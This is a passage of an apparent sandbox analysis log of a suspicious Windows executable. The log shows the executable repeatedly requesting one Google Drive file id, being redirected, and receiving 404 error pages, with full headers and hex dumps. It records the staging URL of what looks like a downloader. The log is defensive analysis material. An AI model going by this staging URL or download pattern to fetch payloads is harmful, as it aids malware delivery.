                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:06:38 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 36 66 39 62 36 38 56 70 54 70 4a 4f 53 64 68 64 42 61 6d 34 66 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="6f9b68VpTpJOSdhdBam4fQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      34192.168.2.1150014172.217.16.1424437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:06:39 UTC424OUTGET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:40 UTC1920INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:39 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-JEJ6SSe87iPDMIhfFLoIwQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      35192.168.2.1150015142.250.184.2254437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:06:40 UTC466OUTGET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:41 UTC1844INHTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgQek9oxGzHmMKbubWnjsv59Va3Yul-Y0-icPFplRdWlxjvuF4aA3hr3ER2RAc-rnvhM
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:40 GMT
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: script-src 'nonce-yWbgOx3ZGeyd64PSbVuhbg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:06:41 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 43 68 75 6b 4b 57 79 48 74 34 33 75 61 34 52 34 32 55 74 43 63 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ChukKWyHt43ua4R42UtCcw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      36192.168.2.1150016172.217.16.1424437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:06:41 UTC424OUTGET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:42 UTC1920INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:42 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: script-src 'nonce-RuILr8t6HAsshaoEvAzHNg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      37192.168.2.1150017142.250.184.2254437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:06:42 UTC466OUTGET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:43 UTC1851INHTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFiumC4CtvgiuzNqD6Vp4OJIXMHd5AkBnmPak_yjkwBEC2qLo3aQqzH-pELs82C9NkGaZlM18Qir1bk
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:43 GMT
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-Dv_-MqUASgVv1_WCykdIkw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:06:43 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 48 67 57 76 66 6b 4d 31 34 64 48 4f 6a 36 6c 36 63 6b 70 43 46 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="HgWvfkM14dHOj6l6ckpCFg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      38192.168.2.1150018172.217.16.1424437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:06:44 UTC424OUTGET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:44 UTC1920INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:44 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-sI519aV0vLyc2pgF6Uvtcg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      39192.168.2.1150019142.250.184.2254437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:06:45 UTC466OUTGET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:45 UTC1844INHTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgTj8JpwWhEFWVkjuaiMhDXKL-ZHcYljt3uPUA7vCdeWVbbsFAhWrHngsJhYyhFhb1LD
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:45 GMT
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-tBW8Fb9UJRGoHgcjviWd5g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:06:45 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 63 72 4e 77 33 67 6a 56 36 50 4c 6a 35 4b 71 61 4e 6a 4f 56 41 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="crNw3gjV6PLj5KqaNjOVAg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      40192.168.2.1150020172.217.16.1424437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:06:46 UTC424OUTGET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:46 UTC1920INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:46 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce---HDxx26Pe6ZcMgjAsIT3Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      41192.168.2.1150021142.250.184.2254437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:06:47 UTC466OUTGET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:47 UTC1851INHTTP/1.1 404 Not Found
